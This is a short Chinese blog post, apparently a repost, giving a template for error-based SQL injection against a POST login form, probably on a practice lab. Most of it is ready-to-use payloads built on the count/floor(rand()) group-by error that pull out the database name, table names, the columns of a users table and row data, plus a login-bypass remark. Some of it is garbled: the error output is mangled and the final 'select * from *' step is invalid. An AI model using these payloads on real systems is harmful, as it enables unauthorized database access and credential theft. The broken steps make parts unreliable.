基于错误的的sql注入模版(post)

本文深入解析了一种特定类型的SQL注入攻击案例,通过错误提示信息利用MySQL的特性进行数据库名、表名、列名及数据的获取。展示了如何构造payload来读取敏感信息,并给出具体的SQL语句实例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、报错分析
riaDBserverversionfortherightsyntaxtousenear'))"andpassword=""LIMIT0,1'atline1
    syntaxtousenear'"""andpassword=""LIMIT0,1'atline1
基于双引号
二、分析类型。
万能登录成功
三、没有回显位。
估计应该是基于错误的注释。

1、正确答案(勿改动)数据库名
uname=123" and (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&passwd=&submit=Submit

1、语句分析:
   mysql CONCAT()函数用于将多个字符串连接成一个字符串,是最重要的mysql函数之一
   (concat("~",database(),"~",floor(rand()*2))):产生报错信息

 细节决定成败

 2、暴表明
 
   database===(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1)
3、暴子端
   uname=123" and (select 1 from (select count(*),(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&passwd=&submit=Submit

 

(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1)
4 暴数据
   select * from * limit 0,1

转载于:https://www.cnblogs.com/123xu/p/9016807.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值